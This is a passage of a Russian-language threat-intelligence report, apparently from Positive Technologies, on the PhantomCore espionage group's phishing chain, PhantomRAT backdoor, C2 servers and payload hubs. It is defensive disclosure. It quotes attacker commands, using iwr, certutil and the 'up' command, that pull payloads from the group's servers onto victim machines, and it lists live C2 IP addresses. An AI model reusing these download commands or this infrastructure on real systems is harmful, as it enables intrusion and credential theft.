\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 PhantomCore, \u0438\u0437\u0443\u0447\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u0430\u0440\u0441\u0435\u043d\u0430\u043b, \u0432\u00a0\u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0440\u0430\u043d\u0435\u0435 \u043d\u0435\u00a0\u0432\u0441\u0442\u0440\u0435\u0447\u0430\u0432\u0448\u0438\u0435\u0441\u044f \u043e\u0431\u0440\u0430\u0437\u0446\u044b \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438, \u0438\u0437\u0443\u0447\u0438\u0442\u044c TTP \u0438 kill chain \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a, \u0430\u00a0\u0442\u0430\u043a\u0436\u0435 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u00a0\u0436\u0435\u0440\u0442\u0432 \u0438\u0437\u00a0\u0447\u0438\u0441\u043b\u0430 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439, \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0441\u0435\u0442\u0438 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u043b\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438, \u0438 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e \u043d\u0435\u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u044b\u0445 \u0441\u043e\u0431\u044b\u0442\u0438\u0439.<\/p>\n<h2>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438<\/h2>\n<p>\u0412\u00a0\u043d\u0430\u0447\u0430\u043b\u0435 \u043c\u0430\u044f \u0442\u0435\u043a\u0443\u0449\u0435\u0433\u043e \u0433\u043e\u0434\u0430 \u043d\u0430\u0448\u0430 \u0433\u0440\u0443\u043f\u043f\u0430 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 TI\u2011\u0434\u0435\u043f\u0430\u0440\u0442\u0430\u043c\u0435\u043d\u0442\u0430 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u043d\u043e\u0433\u043e \u0446\u0435\u043d\u0442\u0440\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Positive Technologies (PT ESC TI) \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u0432 RAT\u2011\u0442\u0440\u043e\u044f\u043d\u043e\u0432, \u0443\u043f\u0430\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0441\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043e\u043f\u0435\u043d\u0441\u043e\u0440\u0441\u043d\u043e\u0439 \u0443\u0442\u0438\u043b\u0438\u0442\u044b UPX (the Ultimate Packer for eXecutables) \u0438 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0432\u0448\u0438\u0445\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0443 \u043f\u043e\u00a0\u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u0435 \u043f\u043e\u0434\u00a0\u0432\u0438\u0434\u043e\u043c ZIP\u2011\u0430\u0440\u0445\u0438\u0432\u043e\u0432, \u0432\u00a0\u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u044b\u0445 \u043f\u0430\u0440\u043e\u043b\u0435\u043c, \u0441\u00a0\u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c \u00ab\u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u044b_\u043d\u0430_\u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0435\u043d\u0438\u0435\u00bb.<\/p>\n<p>\u0417\u0430\u043f\u0443\u0441\u043a \u0438\u043d\u043a\u0430\u043f\u0441\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e LNK\u2011\u0444\u0430\u0439\u043b\u0430 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u043b \u043a\u00a0\u043e\u0442\u043a\u0440\u044b\u0442\u0438\u044e PDF\u2011\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u2011\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0438, \u0430\u00a0\u0442\u0430\u043a\u0436\u0435 \u043a\u00a0\u0441\u043a\u0440\u044b\u0442\u043e\u0439 \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0435, \u0438\u043d\u0441\u0442\u0430\u043b\u043b\u044f\u0446\u0438\u0438 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0443 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 PhantomRAT, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u043b\u0441\u044f \u0441\u00a0C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 195.58.54[.]39.<\/p>\n<figure class=\"full-width\">\n<div><figcaption>PDF \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u2011\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0430 <\/figcaption><\/div>\n<\/figure>\n<p>\u0414\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0435 \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 PhantomCore \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u043e \u0446\u0435\u043b\u0438\u043a\u043e\u043c \u0440\u0430\u0437\u043e\u0431\u043b\u0430\u0447\u0438\u0442\u044c \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044e \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430, \u0441\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0432\u00a0\u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Positive Technologies \u0438 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c \u043a\u0438\u0431\u0435\u0440\u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u044b \u0432\u00a0\u0441\u0435\u0442\u044f\u0445 \u043d\u0430\u0448\u0438\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432, \u0430\u00a0\u0442\u0430\u043a\u0436\u0435 \u0441\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u043f\u0440\u043e\u0438\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0434\u0440\u0443\u0433\u0438\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u043e\u00a0\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 \u0441\u0435\u0442\u0435\u0439.<\/p>\n<h2>\u0410\u043d\u0430\u043b\u0438\u0437 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b<\/h2>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0430\u044f \u0441\u0435\u0442\u0435\u0432\u0430\u044f \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore \u0441\u0442\u0440\u043e\u0433\u043e \u0441\u0435\u0433\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043f\u043e\u00a0\u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u0443 \u0438 \u043a\u043b\u0430\u0441\u0441\u0430\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u043e\u043d\u0430 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 (\u043f\u043e\u0434\u0440\u043e\u0431\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432\u00a0\u2014 \u0432\u00a0\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u043c \u0440\u0430\u0437\u0434\u0435\u043b\u0435).<\/p>\n<figure class=\"full-width\">\n<div><figcaption><a href=\"https:\/\/static.ptsecurity.com\/analytics-and-esc\/phantom-pains\/network-infrastructure.png\" rel=\"noopener noreferrer nofollow\">\u0421\u0435\u0442\u0435\u0432\u0430\u044f \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore<\/a> (\ud83d\udd17 \u0436\u043c\u0438, \u0447\u0442\u043e\u0431\u044b \u0441\u043a\u0430\u0447\u0430\u0442\u044c)<\/figcaption><\/div>\n<\/figure>\n<ol>\n<li>\n<p>C2-\u0441\u0435\u0440\u0432\u0435\u0440 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 PhantomRAT<\/p>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0430\u00a0\u043f\u0435\u0440\u0432\u043e\u0439 \u0441\u0442\u0430\u0434\u0438\u0438 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438\u00a0\u2014 \u043f\u0440\u0438\u00a0\u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0438 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 (Initial Access). \u041f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0431\u0430\u0437\u043e\u0432\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u00a0\u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u043f\u0435\u0440\u0435\u0434\u0430\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043d\u0430\u00a0\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0441\u00a0payload\u2011\u0445\u0430\u0431\u043e\u0432 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0441\u0442\u0435\u0439\u0434\u0436\u0435\u0439: PhantomTaskShell, PhantomProxyLite, MeshAgent, RSocx.<\/p>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 URL\u2011\u043c\u0430\u0440\u0448\u0440\u0443\u0442\u044b:<\/p>\n<ul>\n<li>\n<p>\/connect\u00a0\u2014 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f<\/p>\n<\/li>\n<li>\n<p>\/init\u00a0\u2014 \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435<\/p>\n<\/li>\n<li>\n<p>\/check\u00a0\u2014 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f<\/p>\n<\/li>\n<li>\n<p>\/command\u00a0\u2014 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0434\u043b\u044f\u00a0\u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435<\/p>\n<\/li>\n<li>\n<p>\/out\u00a0\u2014 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0430 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u0432 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b<\/p>\n<\/li>\n<\/ul>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440:<\/p>\n<p><code>195.58.54.39<\/code><\/p>\n<\/li>\n<li>\n<p>C2-\u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0431\u044d\u043a\u0434\u043e\u0440\u0430 PhantomRShell<\/p>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043d\u0430\u00a0\u043f\u0435\u0440\u0432\u043e\u0439 \u0441\u0442\u0430\u0434\u0438\u0438 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438\u00a0\u2014 \u043f\u0440\u0438\u00a0\u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0438 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 (Initial Access). \u0424\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u0430 C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c \u0431\u044d\u043a\u0434\u043e\u0440\u0430 PhantomRAT: \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0431\u0430\u0437\u043e\u0432\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u00a0\u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0430 \u043a\u043e\u043c\u0430\u043d\u0434 \u043d\u0430\u00a0\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0441\u00a0payload\u2011\u0445\u0430\u0431\u043e\u0432 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0441\u0442\u0435\u0439\u0434\u0436\u0435\u0439: PhantomTaskShell, PhantomProxyLite, MeshAgent, RSocx.<\/p>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 URL\u2011\u043c\u0430\u0440\u0448\u0440\u0443\u0442\u044b:<\/p>\n<ul>\n<li>\n<p>\/poll\u00a0\u2014 \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435 \u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b:<\/p>\n<\/li>\n<li>\n<p>\/result\u00a0\u2014 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0430 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u043e\u0432 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b<\/p>\n<\/li>\n<\/ul>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u044b:<\/p>\n<p><code>188.127.254.44<\/code><\/p>\n<p><code>91.239.148.21<\/code><\/p>\n<p><code>185.225.17.104<\/code><\/p>\n<\/li>\n<li>\n<p><strong> <\/strong>Payload\u2011\u0445\u0430\u0431\u044b<\/p>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043d\u0430\u00a0\u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0441\u0442\u0430\u0434\u0438\u044f\u0445 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438 \u0434\u043b\u044f\u00a0\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0439 \u0445\u043e\u0441\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0433\u043e \u0430\u0440\u0441\u0435\u043d\u0430\u043b\u0430:<\/p>\n<ul>\n<li>\n<p>\u0431\u044d\u043a\u0434\u043e\u0440 PhantomTaskShell<\/p>\n<\/li>\n<li>\n<p>\u0431\u044d\u043a\u0434\u043e\u0440 PhantomProxyLite<\/p>\n<\/li>\n<li>\n<p>\u0441\u0442\u0438\u043b\u0435\u0440 PhantomStealer<\/p>\n<\/li>\n<li>\n<p>\u0443\u0442\u0438\u043b\u0438\u0442\u0430 MeshAgent<\/p>\n<\/li>\n<li>\n<p>\u0443\u0442\u0438\u043b\u0438\u0442\u0430 RSocx<\/p>\n<\/li>\n<li>\n<p>\u0443\u0442\u0438\u043b\u0438\u0442\u0430 RClone<\/p>\n<\/li>\n<li>\n<p>\u0443\u0442\u0438\u043b\u0438\u0442\u0430 \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0430\u0440\u043e\u043b\u0435\u0439 XenArmor All\u2011In\u2011One Password Recovery Pro<\/p>\n<p>\u0413\u0440\u0443\u043f\u043f\u0430 \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e payload\u2011\u0445\u0430\u0431\u043e\u0432 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore:<\/p>\n<\/li>\n<li>\n<p>\u0412\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0439 \u0441\u0430\u0439\u0442<\/p>\n<\/li>\n<\/ul>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0430\u00a0\u0441\u0442\u0430\u0434\u0438\u044f\u0445 \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f (Persistence) \u0438 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f (Defense Evasion) \u0434\u043b\u044f\u00a0\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f PhantomTaskShell, MeshAgent \u0438 RSocx \u0438 \u0438\u0445 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0435 \u0445\u043e\u0441\u0442\u044b \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u0430\u043c\u0438 \u0431\u044d\u043a\u0434\u043e\u0440\u043e\u0432 PhantomRAT \u0438 PhantomRShell \u043f\u043e\u00a0\u043f\u0440\u044f\u043c\u043e\u043c\u0443 URL:<\/p>\n<p><code>up https:\/\/&lt;redacted&gt;\/inetpub.zip C:\\ProgramData\\inetpub.zip<\/code><\/p>\n<p><code>up https:\/\/&lt;redacted&gt;\/update.zip C:\\ProgramData\\update.zip<\/code><\/p>\n<p><code>up https:\/\/&lt;redacted&gt;\/hosts.zip C:\\ProgramData\\hosts.zip<\/code><\/p>\n<figure class=\"full-width\">\n<div><figcaption>\u0412\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0439 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0439 \u0441\u0430\u0439\u0442<\/figcaption><\/div>\n<\/figure>\n<ul>\n<li>\n<p>VPS\u2011\u0445\u0430\u0431<\/p>\n<p>VPS\u2011\u0441\u0435\u0440\u0432\u0435\u0440 \u043f\u043e\u0434\u00a0\u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Ubuntu \u0441\u00a0\u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0439 SSH\u2011\u0441\u043b\u0443\u0436\u0431\u043e\u0439 \u0438 80\u00a0(HTTP) \u0438 443\u00a0(HTTPS) \u0441\u0435\u0442\u0435\u0432\u044b\u043c\u0438 \u043f\u043e\u0440\u0442\u0430\u043c\u0438, \u043c\u0435\u043d\u044f\u044e\u0449\u0438\u043c\u0438 \u0441\u0432\u043e\u0435 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0441\u00a0\u0437\u0430\u043a\u0440\u044b\u0442\u043e\u0433\u043e \u043d\u0430\u00a0\u043e\u0442\u043a\u0440\u044b\u0442\u043e\u0435 (\u043f\u043e \u043d\u0430\u0431\u043b\u044e\u0434\u0435\u043d\u0438\u044f\u043c \u0433\u0440\u0443\u043f\u043f\u044b \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438, \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u0435 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u043e \u0432\u00a0\u043d\u0430\u0447\u0430\u043b\u0435 \u0440\u0430\u0431\u043e\u0447\u0435\u0433\u043e \u0434\u043d\u044f, \u043a\u043e\u0433\u0434\u0430 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0435 \u0445\u043e\u0441\u0442\u044b).<\/p>\n<figure class=\"full-width\">\n<div><figcaption>\u0421\u0435\u0442\u0435\u0432\u043e\u0439 \u043f\u0440\u043e\u0444\u0438\u043b\u044c VPS\u2011\u0445\u0430\u0431\u0430<\/figcaption><\/div>\n<\/figure>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0430\u00a0\u0441\u0442\u0430\u0434\u0438\u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 (Credential Access) \u0434\u043b\u044f\u00a0\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0441\u0442\u0438\u043b\u0435\u0440\u0430 PhantomStealer \u0438 \u0443\u0442\u0438\u043b\u0438\u0442\u044b \u0434\u043b\u044f\u00a0\u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0430\u0440\u043e\u043b\u0435\u0439 XenArmor All\u2011In\u2011One Password Recovery Pro \u0438 \u0438\u0445 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0435 \u0445\u043e\u0441\u0442\u044b \u0431\u044d\u043a\u0434\u043e\u0440\u043e\u043c PhantomTaskShell \u043f\u043e\u00a0\u043f\u0440\u044f\u043c\u043e\u043c\u0443 URL:<\/p>\n<p><code>iwr -Uri \"http:\/\/188.127.254.234:80\/browser.zip\" -OutFile \"C:\\ProgramData\\browser.zip\"<\/code><\/p>\n<p><code>certutil.exe -urlcache -f http:\/\/188.127.254.234\/one.zip C:\\ProgramData\\one.zip<\/code><\/p>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440:<\/p>\n<p><code>188.127.254.234<\/code><\/p>\n<\/li>\n<li>\n<p>\u0424\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0439 \u0441\u0430\u0439\u0442<\/p>\n<p>\u0417\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d \u043d\u0430\u043a\u0430\u043d\u0443\u043d\u0435 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430, \u0432\u00a0\u0430\u043f\u0440\u0435\u043b\u0435 \u0442\u0435\u043a\u0443\u0449\u0435\u0433\u043e \u0433\u043e\u0434\u0430, \u043d\u0430\u00a0\u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0438\u043d\u0430 \u0420\u043e\u0441\u0441\u0438\u0438 \u0441\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0430\u0434\u0440\u0435\u0441\u0430 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b iseh34228@proton[.]me.<\/p>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u0443\u044e HTML\u2011\u0432\u0435\u0440\u0441\u0442\u043a\u0443 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0441\u0430\u0439\u0442\u0430 \u041c\u043e\u0441\u043a\u043e\u0432\u0441\u043a\u043e\u0433\u043e \u0433\u043e\u0440\u043e\u0434\u0441\u043a\u043e\u0433\u043e \u0444\u043e\u043d\u0434\u0430 \u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u043c\u0435\u0434\u0438\u0446\u0438\u043d\u0441\u043a\u043e\u0433\u043e 